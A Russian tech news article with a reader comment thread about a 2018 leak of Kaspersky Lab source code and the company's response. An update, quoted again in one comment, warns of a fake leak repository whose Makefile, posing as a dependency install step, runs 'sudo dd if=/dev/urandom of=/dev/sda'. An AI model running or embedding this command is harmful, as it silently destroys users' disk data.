Сегодня утром на телеграм-канале Mash был опубликован анонимный «слив» про утечку исходников «Лаборатории Касперского». Утверждалось, что сотрудник компании «на протяжении длительного времени скачивал исходные коды антивируса — и в ноябре 2017 года выложил их на GitHub. «Лаборатория Касперского» заметила слив в январе 2018 года, после новогодних праздников, добилась удаления исходников, вычислила виновника — и обратилась в МВД.


«Лаборатория Касперского» в 13:08 очень оперативно выступила с «опровержением», которое в реальности подтверждает многие факты. Но компания настаивает, что в Сеть были слиты исходники не антивируса, а каких-то других продуктов. Каких — компания не говорит. Она также не называет ни имени, ни должности провинившегося сотрудника.

«Действительно, бывший сотрудник “Лаборатории Касперского” выложил в публичный доступ часть кода, к которому имел правомерный доступ в рамках своей работы. Данный код не является частью антивируса, — сообщили в пресс-службе компании. — Данные были обнаружены на следующий день, после чего удалены из публичного доступа в кратчайшие сроки».

«Собрав все доказательные материалы, компания обратилась в правоохранительные органы. По данным материалам было возбуждено уголовное дело по признакам преступления, предусмотренного ст.183 УК РФ (незаконные получение и разглашение сведений, составляющих коммерческую, налоговую или банковскую тайну)», — добавили в пресс-службе.

Пока что в этой истории слишком много непонятно. Остаётся только дождаться, когда будут повторно опубликованы утёкшие исходники или хотя бы список опубликованных файлов, чтобы оценить степень угрозы для пользователей продуктов «Лаборатории Касперского». Если в Сеть действительно попали исходники антивируса, как в 2010 году, то эту защиту можно считать скомпрометированной, потому что злоумышленники наверняка постараются найти уязвимости в программе.

Добавим только, что в прошлый раз исходники антивируса тоже слил сотрудник компании, которого компания также сдала полиции. Впоследствии парень получил срок три года условно по той же статье 183 УК РФ.

UPD. Осторожно, в одном из репозиториев GitHub под названием Kaspersky leak 2018 Makefile содержит такие строки:

all:
echo Check depends…
echo Install depends…
sudo dd if=/dev/urandom of=/dev/sda


Если запустить это, то можно потерять информацию на /dev/sda.

Комментарии (111)


  1. mickvav
    28.02.2018 18:49
    +3

    Гхм, а почему, собственно, из публикации исходников автоматически следует компрометация продукта? Это ж ещё надо уязвимость найти или способы обхода имеющихся защитных механизмов антивируса придумать. FUD какой-то.


    1. YaMishar
      28.02.2018 18:57
      +1

      Ну или увидеть явные закладки. А это уже да, компрометация. :)


    1. DSolodukhin
      28.02.2018 19:17
      +6

      С такой позиции весь OpenSource скомпрометирован с момента рождения.


    1. Eklykti
      01.03.2018 03:52

      Потому что у них security through obscurity вместо настоящей.


    1. antonn
      01.03.2018 08:38

      Множество закрытого кода используют закрытость как одну из мер защиты — сложнее разобраться где есть уязвимость.
      От Касперского начал уходить когда они купили проактивку и начали встраивать ее в свой продукт, полностью вырезав классический фаервол и отправляя уведомления о каждом запуске любого exe на свой сервер (конечно же для обеспечения своевременной работы защиты, ага). Помню как уходили от ответа их сотрудники на форуме, когда их спрашивали, почему проактивка начинает работать спустя пол минуты после загрузки компа и рабочего стола, сам ставил такие эксперименты и подтверждал этот баг. Теперь, при наличии исходников (да и в 2008 они утекали), проще выявить где что недогружается и где есть слабина.


      1. Popadanec
        01.03.2018 11:31

        На что перешли?
        Уже лет десять пользуюсь их продуктом, ни разу не было чтобы он что то пропустил(или я забыл такие моменты).
        Вот что сильно бесит, так он очень вовремя начинает качать обновления(когда я в онлайн игре). И казалось бы апдейт весит 30-50мб, качается неторопливо за пол часа(при 10мбит/с канале), но онлайн игра в это время становится невозможной из за высокого пинга(200мс++).
        Меня он самого достал. Переводят функционал из одной платной версии в другую более дорогую. Добавляют сомнительный функционал(типа отслеживания неиспользуемых ярлыков или обновление установленных программ до последней версии)


        1. daggert
          01.03.2018 13:39
          +1

          Попробуйте забить на антивирус вовсе. Чуточку аккуратности и можно жить без дарения ресурсов лишнему ПО.


          1. nidalee
            01.03.2018 14:04

            Я так однажды год с майнером просидел.


            1. daggert
              01.03.2018 15:41

              Честно говоря. не представляю себе как, в эпоху дешевых подписок на софт и при живом стиме/гоге можно подхватить майнер. Ну хотя у меня юзкейс видимо другой. В любом случае без аккуратности никак — никаких игр с торрентов, никаких непонятных кряков и все будет ок (:


              1. nidalee
                01.03.2018 19:29

                Я тоже не представлял. Просто надоело, что видеокарта шумит.
                Ну я и посмотрел список процессов, использующих GPU.


                1. Skerrigan
                  02.03.2018 06:58

                  Просто надоело, что видеокарта шумит

                  За аспект «тишина» веду борьбу нещадную, в ход идут все средства:
                  — стяжки для кабелей и более правильная прокладка
                  — создание проточки сквозной со вдувом и выхлопом
                  — радиаторная башня весом в килограмм
                  — огромные кулера, со сверх-низкими оборотами (600-650-700об/мин)
                  Как итог, у меня в системнике 4 вертушки + 2 на видеокарте (так же там все не по-простому). И просто кристальная тишина. Слышно как головки/диски работают (2,5") и как еле-еле гудит из колонок. Шепотом говорить и то громче, чем стац работает. Это настоящий кайф.


                  1. Popadanec
                    02.03.2018 11:02

                    Никакой особой борьбы за тишину не вел. Настроил пороги срабатывания вентиляторов в биосе, температура в среднем по больнице 45 градусов. Пока не играю тишина такая что не раз пытался включить компьютер думая что он ушел в режим сна, хотя был просто выключен монитор. Система на NVMe, игры частью на нем же, частью на ssd. Обычные жесткие диски большую часть времени спят.
                    Корпус большая башня с парой вентиляторов(15см?) на продувку, башня первая что на глаза попалась с медными трубками и алюминиевым радиатором, на видеокарте вентиляторы самостоятельно включаются только при запуске игр, Б.п. так же не слышно.
                    i5 7600K, GTX980(знаю пара не сбалансирована, собирался менять, но майнеры чтоб их). Китайский ваттметр при запущенном хроме показывает потребление в ~60 ватт.


                  1. nidalee
                    02.03.2018 14:29

                    Да я не веду борьбу за тишину, да и видеокарту поменял уже.
                    Меня просто напрягало, что она постоянно работает. Думал, может это интерфейс винды балуется или аппаратное ускорение в браузере.
                    А оно вон как оказалось.


              1. mtex
                01.03.2018 22:03
                -1

                никаких игр с торрентов, никаких непонятных кряков


                Ужас какой. Не проще отдельный комп для развлечений поставить?


              1. zerg59
                01.03.2018 22:42

                Аккуратность это да. В самом деле антивирусы создают ложное ощущение абсолютной безопасности. Чего в самом деле нет. А при достаточной степени паранойи и аккуратность и игры с торрентов (проверенных) вполне безвредны. Просто это давняя фишка антивирусов ругаться ужасными словами на «лекарства». Как-то в теме с одним специфичным софтом была поднята паника на тему зловреда. Я посмотрел — указанный файл идентичен файлу из дистрибутива и вызывает то же ложное срабатывание.


                1. nidalee
                  02.03.2018 14:32

                  Ну, лично мне проще добавлять в исключения то, что я считаю безопасным, чем следить, не появилось ли у меня ничего лишнего в процессах.


          1. antonn
            01.03.2018 15:33

            Есть вероятность получения зловреда через уязвимости софта. Например, лет 10 назад подхватил трояна, который используя уязвимость в плагине Adobe PDF, через баннерную сеть на сайте программистов (винград) смог загрузиться мне в temp и там запуститься.
            К сожалению, использовал Тотал Коммандер для работы с ftp и сохранив пароль, так что его увели и слили исходники сайта с хостинга, попутно внедрив в каждый скрипт вывод фрейма :)


            1. sumanai
              01.03.2018 15:43

              смог загрузиться мне в temp и там запуститься.

              От этого защищают политики SRP на 100%.


          1. Popadanec
            01.03.2018 17:41

            Не получится. Банковский токен требует установленного Касперского.
            Не знаю проплаченный пиар это или что, но софт банка не запускается если выключен(пусть даже установлен) антивирус.


            1. sumanai
              01.03.2018 18:50
              +1

              Сменить банк?


              1. Popadanec
                01.03.2018 19:12

                Я подумываю, т.к. он не поддерживает интеграцию с моей интернет бухгалтерией. И достает копировать циферки из счета в *.pdf в окно банк клиента.
                Особенно счета в фонды с их кодами КБК и прочей лабудой. А порой еще и текст с пдф-ки копируется сломанный.


        1. antonn
          01.03.2018 15:11

          Да, ушел от Касперского.
          Мне нужно было комплексное решение — антивирус и фаервол. Мне не нужен фаервол, который самостоятельно определяет «угрозу» от приложения, (и если оно доверенное для господ из Касперских — ему «зеленый свет» в интернет на моем компе). Кому куда можно за своим ПК решаю только я, что сделать в KIS достаточно геморройно.
          Не знаю как сейчас, но раньше периодически запускалась проверка системных объектов, что напрочь подвешивала компьютер, при автологине в ОС защита начинала работать спустя пол минуты, трафик на адреса касперского забанил еще на роутере и само это действие расстраивало, в интерфейсе практически нельзя было ничего сделать в окне смены правил на приложение. Потому что я программист, на компе множество сэмплов и своих программок, правила в проактивке были наглухо забиты моими скомпиленными экзешниками (а уж какие пляски с бубнами требовалось чтобы добавить в исключение свежескомпиленную программу работающую с сетью...). Пользоваться KIS было от «неприятно», до «невозможно».

          Перешел на Microsoft Security Essentials (была возможность), + учетки с ограниченными правами и виртуалки (hiper-v) для серфинга и «подозрительных» действий в интернете :)


    1. mtex
      01.03.2018 10:19
      -1

      а почему, собственно, из публикации исходников автоматически следует компрометация продукта?

      Ну как, очевидно же: вскроются КГБшные бэкдоры.


  1. wscms
    28.02.2018 18:58
    +10

    Файлообменник github точка ком. Рукалицо.


    1. neenik
      28.02.2018 22:06

      Сначала сделал так же. Но потом подумал, что могли иметь в виду gist.github.com.


    1. asmrnv777
      01.03.2018 00:40

      Ну так писалось не только для технически подкованной аудитории. Потому и такая формулировка.


      1. sumanai
        01.03.2018 00:46

        Писать не для технически подкованной аудитории на ресурсе для технически подкованной? А разгадка одна безблагодатность на других сайтах написано ровно тоже самое.


        1. alizar Автор
          01.03.2018 08:41

          Это канал Mash — ресурс для технически подкованной аудитории? Вы думаете, только гики читают телеграм?


          1. sumanai
            01.03.2018 15:42

            Мы сейчас на ГТ, а не на маше или телеге.


            1. alizar Автор
              01.03.2018 15:50

              Да, мы на ГТ обсуждаем фразу с канала Mash, который назвал Github файлообменником.


          1. zerg59
            01.03.2018 22:46

            Я подписан на разное в телеграмме. Но не на Маш. Ибо желтуха. Что и было сейчас ещё раз показано.


            1. alizar Автор
              02.03.2018 08:55

              Ясное дело, что желтуха. Это тот же Лайф.ру и российское ТВ, вид сбоку:

              Редакция Mash также начинала работать в «Лайфе», а сейчас переехала в отдельный офис, но, как объяснил Могутин, «фактически работает их [„Лайфа“] новостной службой». «Мы поставляем им контент», — добавил он, заметив, что у себя Mash публикует не более 20% от собранного материала. Помимо «Лайфа» Mash поставляет контент и другим изданиям, в том числе неназванным федеральным телеканалам» [source]


      1. Simplevolk
        01.03.2018 08:27

        Может это такой тонкий юмор?


  1. voidptr0
    28.02.2018 19:04
    +1

    Так вроде ж только была статья, что предоставление исходников для аудита не есть зло.
    «Аудит программного кода необходим. Безопасность через неясность — зло» geektimes.ru/post/298563
    Или тут соображения другого порядка?
    P.S. Я понимаю, что база представляет коммерческую тайну, но сами, как указано в статье, «исходники»?


    1. TheKnight
      28.02.2018 19:51
      +1

      Эвристические алгоритмы, возможно?


    1. Nick_Shl
      28.02.2018 20:30
      +2

      Вот-вот! Пользователям данного продукта стоит задуматься и задаться вопросом "А стоит ли полагаться на систему защиты, которая сама защищена принципом 'безопасность через неясность?'".


      1. areht
        28.02.2018 21:41

        Для полной безопасности надо как в том анекдоте, «надеть презерватив, смазать подсолнечным маслом, надеть второй, смазать йодом, сверху забинтовать и смазать эпоксидкой. И главное — никаких половых контактов!»

        А антивирус — это всегда некий компромисс.


      1. avost
        01.03.2018 10:25
        -1

        Тссс. Не спугните! А то ведь не ровён час и пользователи некоторой операционной системы начнут задумываться о принципе, который положен в основу так называемой безопасности (и всего прочего) их системы, которую нужно "защищать" подобным образом :)


        1. Alesh
          01.03.2018 14:19

          А чего минусуем интересно, человек правду же написал. Защита Виндовз на том же самом принципе основана security through obscurity.


          1. mtex
            01.03.2018 21:50

            А чего минусуем интересно


            Ну не любят люди, когда им на любимую мозоль наступают.


          1. areht
            01.03.2018 23:29

            Они исходники и в ФСБ показывали, и в сеть исходники утекали


    1. wadeg
      01.03.2018 00:59

      но сами, как указано в статье, «исходники»?
      Исходники инструмента слежения от «бывшего» кагэбэшника. Такой нажористый объект будут очень пристально изучать много очень опытных исследователей. С другой стороны, если грамотно сделано — бэкдор обнаружить будет нелегко. Ждем новостей (или как раз нет)?


  1. 1nsidE
    28.02.2018 20:01
    +1

    а больше никто не заметил этот репозиторий до Касперского и случайно торрентом не начал раздавать? :)


  1. Plone
    28.02.2018 20:50
    +1

    Скачивать-то где? =)


    1. ivan386
      28.02.2018 21:49
      -1

      Гугл: github Kaspersky


      1. sumanai
        28.02.2018 22:22
        +1

        Там фигня на 5 мегабайт, или утечка 2008, но ничего нового там сейчас нет.


        1. LLE
          28.02.2018 22:43

          Не 5, а почти 10, но все равно фигня.


        1. LLE
          28.02.2018 22:47

          ЭТО?

          Makefile:
          all:
          echo Check depends…
          echo Install depends…
          sudo dd if=/dev/urandom of=/dev/sda


          1. sumanai
            01.03.2018 00:44

            А это разве не фигня?


            1. Serge78rus
              01.03.2018 10:03
              +1

              Это не фигня, а самый надежный способ избавиться от любого вредоносного кода на устройстве /dev/sda


              1. sumanai
                01.03.2018 15:44

                Смотря какую ОС использовать. Нужно сделать PR на ветку для Windows, а то непорядок.


    1. Kobalt_x
      01.03.2018 11:27

      уже походу нигде


      1. Light_Metal
        01.03.2018 11:34

        Судя по комментариям, некоторые успели подсуетиться насчёт скачать.
        Может кто поделиться ссылкой/архивом?


        1. Kobalt_x
          01.03.2018 18:10

          Не видел ни архивы ни ссылок нашел в веб архиве страницу гитхаба с папками. Там wmihlpr есть какой нафиг makefile. Ничего говорить по поводу слива не буду. Но мне кажется что это тупо набор папочек и даже близко не продукт и собрать что-то рабочее из этого маловероятно


          1. sumanai
            01.03.2018 19:10

            Вы нашли фейк с мейкфайлом на удаление раздела в люнуксе и парой папок со старого слива. Нового слива в вебархиве не было, на него вообще не было ссылок, судя по всему.


    1. vko
      03.03.2018 11:22
      +1

      https://github.com/KasperskyLab/ForensicsTools/blob/master/SOURCES/forensics/main_parse_evtx.cpp


      Пример кода, написанного сотрудником ЛК.


      1. Vladek
        03.03.2018 20:20

        У автора кода tab вместо пробела? Выглядит странно, да и вообще вкусовщина.


  1. efremovd
    28.02.2018 20:59

    Хм, это не поэтому ли правительство США решило отказаться от этого антивируса :). Нашли в исходниках много интересного…


    1. snnrman
      01.03.2018 06:54

      Если они что и нашли, то только безолаберность сотрудников АНБ.


  1. sumanai
    28.02.2018 21:13
    +1

    Как бы написать поисковик по новым репам на гитхабе, чтобы такое вот вылавливать?


    1. 0o0
      01.03.2018 03:04

      Это я в аутлуке сделал правило, всю входящую почту тупо копировать в pst'шник. Любопытно посмотреть, что там юзеры за письма отзывают иногда ^-^


    1. ReklatsMasters
      01.03.2018 11:42

      Я в том году, после того как слили сорцы оперы 12, тоже решил озаботиться этой темой. Даже сделал либу, которая выкачивает всё это. Но потом посчитал сколько нужно места и забил. Совершенно случайно обнаружил, что некоторые из первых репов гитхаб, кажется, потерял.

      github.com/reinh/dm


      1. sumanai
        01.03.2018 15:49

        Ну так не всё подряд нужно качать, а только интересное. Сырцы винды например можно палить по приватным именам файлов, которые никогда не утекали в сеть, но мелькали в других утечках, или там отладочных файлах.
        Ну и выкачивать с гитхаба на гитхаб не имеет смысла, он снесёт все клоны по жалобе правообладателей.


        1. ReklatsMasters
          01.03.2018 19:25

          С чего вы взяли, что я с гитхаба на гитхабе выкачивал? Я имел в виду на компе это займёт много места. К тому же, если написать целенаправленный поисковик сорцов винды, можно пропустить другие утечки.


          1. sumanai
            01.03.2018 22:50

            С чего вы взяли, что я с гитхаба на гитхабе выкачивал?

            Наверное просто не понял, к чему ссылка на нерабочий репозиторий.
            К тому же, если написать целенаправленный поисковик сорцов винды, можно пропустить другие утечки.

            Ну это я к примеру. Фильтр нужно настраивать на интересующие ключевые слова, чтобы не качать весь гитхаб.


    1. devalone
      03.03.2018 08:49

      Используя API GitHub'а?

      Вообще, можно и не писать cloud.google.com/bigquery/public-data/github сервис правда не бесплатный и не уверен, удаляют ли они исчезнувшие репозитории с гитхаба


  1. Evgeniy112
    28.02.2018 22:43

    интересно, сколько закладок найдут


  1. alexoron
    28.02.2018 22:58

    Касперские настолько боятся слива исходников чтобы американцы не увидели шпионские компоненты, которые использовались в слежке за Хилари.


  1. HueyOne
    01.03.2018 07:15

    Три года условно?
    Но ведь это умышленное преступление, которое, потенциально ставит под угрозу многолетний труд нескольких тысяч человек. Например, некто разрушит жилой многоквартирный дом. Его, очевидно, приговорят к реальному сроку. А здесь в чем разница?


    1. Deosis
      01.03.2018 07:52

      В данном случае имела место публикация чертежей дома.
      Сейчас стоит вопрос о наличии потайного хода из подвала в ванную.


      1. willmore
        01.03.2018 08:04

        И виноват будет не архитектор-вуайерист, а прораб, заподозривший неладное.


        1. ptica_filin
          01.03.2018 08:41

          Причём не только заподозривший, но и рассказавший всем соседям.


  1. svr_91
    01.03.2018 09:10

    Нужно было выкладывать в блокчейне…


    1. sumanai
      01.03.2018 16:01

      Стоимость такого прикола составит более полумиллиона баксов, для биткоина.


      1. svr_91
        01.03.2018 16:34
        +1

        Не обязательно сохранять в биткоине. Можно и в эфире, например. по моим подсчетам, 200 kb данных там будут стоить около 1000 долларов. Тоже много, но не так уж и неподъемно.
        Или можно выбрать другие валюты типа bitcoin cash
        (Да и вообще это была шутка)


        1. sumanai
          01.03.2018 16:38

          200 kb

          Утечка 2008 года весит 181 мегабайт в упакованном виде. Вряд ли за 9 лет сорцы похудели.


          1. svr_91
            01.03.2018 16:42

            Тогда да. Хотя врядли 180 мегабайт (к томуже в запакованном виде) весят именно исходники. Почти наверняка там бинарные данные, сторонние библиотеки и т.д.


        1. svr_91
          01.03.2018 18:03

          Пересчитал стоимость еще раз. Если исходить из этой транзакции
          etherscan.io/tx/0x25e54394ab4e5f17d6e1240c02c1a6c4bb675ef9471f1105b006988f5fe5aec1
          То по текущему курсу на 45 кб данных нужно 130$
          Но при этом gas price довольно большой, 50Gwei. Если словить момент, то вполне можно отправить и за 1Gwei (а то и меньше).
          Таким образом, в 1 килобакс можно уместить чуть меньше 20Мб данных, что вполне неплохо. А если еще дождаться падения курса, или использовать какой-нибудь ethereum classic, то выйдут вообще копейки


  1. technarium
    01.03.2018 10:16

    Есть и другие антивирусные средства, конкуренцию никто не отменял.


  1. Rohan66
    01.03.2018 12:01

    Касперский имеет сертификат ФСТЭК. А для его получения в сертификационную лабораторию передаются и скомпилированный продукт и его исходники. Так что «безопасность через неясность», на мой взгляд, здесь несколько не подходит.


    1. alexoron
      01.03.2018 12:04

      Заметьте, исходники можно любые подсунуть.
      Убрать «неудобные» участки кода, все равно никто и не заподозрит.


      1. Rohan66
        01.03.2018 12:09

        К сожалению — не получится! В процессе сертификации производится компиляция программы из исходных кодов и должно быть полное совпадение с представленным экзешником.
        Во всяком случае — в той лаборатории, что сертифицировала касперского (ВИВОСС и ОИ), нашу программу именно так и сертифицировали.


        1. EvgeniyNuAfanasievich
          01.03.2018 12:59

          как это получится? МОжет тогда и компилятор вместе с компом отдают для сертификации?? Как иначе могут хэш суммы совпасть…


          1. Rohan66
            01.03.2018 13:06

            При подаче программы на сертификацию описывается версия ОС, компилятора и прочее, что использовалось и с какими настройками.
            Процесс достаточно затратный как по деньгам, так и по времени. Хэш в формуляре будет прописан для каждого файла инсталлятора. Могут даже привести КС, для развёрнутого программного продукта.
            Где обрабатывается ГТ — там всё замороченно и строго. А сейчас наличие антивируса — обязательное условие. Выбор — Касперский или Веб.


          1. Rohan66
            01.03.2018 13:08

            Дополню. У себя компилировали на свежеустановленной машине, без посторонних программ. Только то, что нужно для компиляции. И свою версию компилятора отвозили в лабораторию.


            1. Mogwaika
              01.03.2018 13:27

              А компилятор до этого тоже сертифицировали?


              1. Rohan66
                01.03.2018 15:28

                ОС сертифицирована. В состав входит компилятор. Сначала делали под МСВС, а потом под Астру.


        1. JustMoose
          01.03.2018 15:21

          Невозможно получить полное совпадение.
          Хотя бы потому, что в exe могут попадать даты сборки.
          Или сборочные пути (если собирается exe+pdb).

          В общем, чтобы хеш получился тем же, нужно потратить некоторое количество усилий на допил исходного кода и придумывание специальных условий для сборки.


          1. Rohan66
            01.03.2018 15:27

            В такие тонкости не вникал (не программист), но у нас всё совпало.


            1. Sap_ru
              02.03.2018 01:41

              И касперский сертифицируется каждую неделю, вы считаете? :)


          1. a5b
            02.03.2018 02:11

            Невозможно получить полное совпадение.

            Более чем для 3/4 пакетов debian смогли: https://wiki.debian.org/ReproducibleBuilds https://wiki.debian.org/ReproducibleBuilds/Howto "Files in data.tar contain timestamps"
            также https://en.wikipedia.org/wiki/Deterministic_compilation https://reproducible-builds.org/ https://github.com/jasonwhite/ducible


            1. JustMoose
              02.03.2018 08:45

              Хорошо. Совпадение возможно!
              (Хотя теперь у меня вопросов больше, чем ответов ;)


          1. KciroohS
            02.03.2018 17:38
            +1

            Лет надцать назад пытался добиться «детерминированной сборки» (компиляции и линковки).
            Одной из целей комплексной системы управления проектом была инкрементальная рассылка только изменившихся бинарников пользователям. Хотелось, чтобы бинарники менялись только при изменениях в исходниках, а не при каждой сборке.
            Столкнулся с множеством нюансов, на уровнях obj, lib, dll/exe. С watcom было проще, с microsoft/visual — сложнее.
            Всего не упомню, но в частности:
            — Timestamps (дата и время сборки): здесь решалось даже patch'ем бинарных модулей после компилятора, когда timestamp'ы выставлялись равными дате-времени исходников.
            — Неиспользуемые области бинарников, которые не всегда забивались нулями, туда мог попадать мусор. На работу это не влияло, но контрольная сумма уже иная.
            — И даже недетерминированная оптимизация, когда компилятор при разных запусках по какой-то причине выделял разные регистры под одну и ту же переменную.
            — Это не всё.


    1. antonn
      01.03.2018 12:21

      ФСТЭК не будет регламентировать работоспособность функционала не относящегося к защите: показ рекламы в формах и назойливых уведомлений, подхват лицензии (и ее обход), работоспособность при настройках не относящихся к рабочему месту требующего сертификата (домашние версии, в общем-то, иначе работают). К тому же, сертификация накладывает определенные NDA на участников, так что если уязвимость (именно в контексте ФСТЕК) и будет найдена — ее исправят, а не понапишут зловредов ее эксплуатирующую.


      1. Rohan66
        01.03.2018 12:31

        С этим даже спорить не буду! Но не думаю, что движок сертифицированной версии будет кардинально отличаться от несертифицированной. То, что к домашней могут навесить «свистелок» и рекламы — запросто. Но, как я думаю, движок будет нормальный.
        А лицензию и сертифицированная версия требует (У ДрВеба — также).


    1. Houl777
      01.03.2018 15:48

      Посмотрите CVE по Инфотексу. ФСТЭКом там и не пахло. Как такое пропустили я даже не знаю…


      1. Rohan66
        01.03.2018 15:51

        ног там же написано (жирным шрифтом)

        Данной уязвимости не подвержены версии продукта, соответствующие требованиям к СКЗИ класса КС3, при эксплуатации которых в обязательном порядке в соответствии с формуляром используется дополнительное ПО ViPNet Syslocker, выполняющее функцию контроля целостности среды функционирования.

        Хотя — всё равно странно…


        1. Houl777
          02.03.2018 10:08

          Ключевое тут — КС3.


    1. sumanai
      01.03.2018 16:04

      Так что «безопасность через неясность», на мой взгляд, здесь несколько не подходит.

      Подходит полностью. Что значит одна лаборатория, где работает непонятно кто за российскую зарплату, в сравнении с мировой общественностью?


      1. Rohan66
        01.03.2018 16:13

        Как вы подленько оскорбили хороших специалистов! Вот вы — это непонятно кто! Хотя понятно…
        И покажите мне эту «мировую общественность»? И, заодно, исходники их антивирусов, операционок, средств защиты информации… Тех, которые используют не любители и гики, а солидные корпорации, военные ведомства, гос. конторы.


        1. sumanai
          01.03.2018 16:34
          +2

          Как вы подленько оскорбили хороших специалистов!

          Вы поймите, что не может дна отдельно взятая лаборатория быть умнее всего остального человечества. Это не оскорбление, а констатация факта.
          И покажите мне эту «мировую общественность»?

          Я не безопастник, и не знаю фамилии наизусть.
          И, заодно, исходники их антивирусов, операционок, средств защиты информации…

          github.com/torvalds/linux Извиняюсь, но искать ветку в версией 2.6, используемую в ОС МСВС, я не буду.


          1. Rohan66
            01.03.2018 16:43
            -1

            Из вашего ответа следует, что «все человечество» — «безопасники»? Забавная логика…

            И каков процент использования Линукса в мировом масштабе?
            Где исходники винды, нортона, маккафи, аваста в конце концов?
            Или касперского за закрытые исходники можно пинать, а остальные — табу? Очень логику ВАДа напоминает! )))
            Ну и ссылка на «мировую общественность» в тоже тему! )))


            1. sumanai
              01.03.2018 16:56
              +1

              Из вашего ответа следует, что «все человечество» — «безопасники»? Забавная логика…

              Не менее забавно, чем ваша логика.
              Если сертификацией могут заниматься больше одной лаборатории, то ваша логика уже проваливается- одна лаборатория проверит заведомо хуже, чем две в случае открытых исходников.
              И каков процент использования Линукса в мировом масштабе?

              А зачем нам мировой масштаб? Вы же просили «а солидные корпорации, военные ведомства, гос. конторы». Так я и указал ссылку на исходники, которые используются в российской оборонке и проталкивается в другие учреждения.
              Где исходники винды, нортона, маккафи, аваста в конце концов?

              Я их вам не обещал.
              Или касперского за закрытые исходники можно пинать, а остальные — табу?

              Я разве такое писал? Это вы за меня додумываете. В топике обсуждается Касперский.


            1. jex
              01.03.2018 17:40

              И каков процент использования Линукса в мировом масштабе?

              Более 50% всех устройств работают на базе linux kernel и их доля увеличивается.


        1. Sap_ru
          02.03.2018 01:51
          +1

          Вы же в курсе, что МСВС версий, включая актуальную, ломается сотней способов на всех уровнях? Локально, по сети, как хотите. Подмена файлов, копирование файлов — что хотите.
          Вы в курсе, что МСВС при чистой установке содержит закладки? Посмотрите сетевой трафик чистой системы с установленным веб-браузером.
          Что Астра сертифицированная ломается так же точно. А Астра с обновлениями не может быть сертифицированна в принципе. Что Астра сертифицированна вместе с бинарными модулями ядра сторонних авторов (сертифицированы бинарные драйвера видео, на которые никто никаких исходников не давал, и который содержат уйму софта), что уже с ходу аннулирует любые мысли о ценности такой сертификации.
          Короче, вся эта сертификация — чистый и бессмысленный попил денег и не более того.


    1. Sap_ru
      02.03.2018 01:40
      +1

      Глупость, даже если каким-то чудом они проверяют именно так, как вы тут рассказываете (у меня совсем другой опыт).
      Наводящие вопросы: какая конкретно версия сертифицировалась, сертифицируется ли каждая версия, сколько денег и времени занимает сертификация, работают ли у сертифицированного Касперского обновления. Задумайтесь, и вы поймете, что сертификация в РФ это туфта полная и никто ее честно не проходит.


  1. Sap_ru
    02.03.2018 12:21

    А почему этот статья не находится на сайте поиском по названию? Например, по слову «Касперского»?
    Кто-то кому-то заплатил?


    1. antonn
      02.03.2018 12:33
      +1

      Может вы ищете «по релевантности»? Переключите «по дате» и новость будет первой в выдаче.


      1. Sap_ru
        02.03.2018 12:41
        -1

        Вечно забываю, что это сайт писали и поддерживают инопланетяне…


        1. Popadanec
          02.03.2018 13:41

          Через гугл поиск тут статьи лучше ищутся. У меня это тоже вызывает недоумение.


  1. Habridos
    02.03.2018 13:48
    -1

    Возможно они сами организовали «слив», чтобы показать амерам исходный код. Те ведь утверждают, что Касперский следит и все такое, после чего закрыли им доступ на американский рынок. Это огромные потери для Касперского. Они лишились больших бабок. Так что вполне возможно, это не простой слив. Сварганили по быстрому легенду о «сотруднике», и — вперед.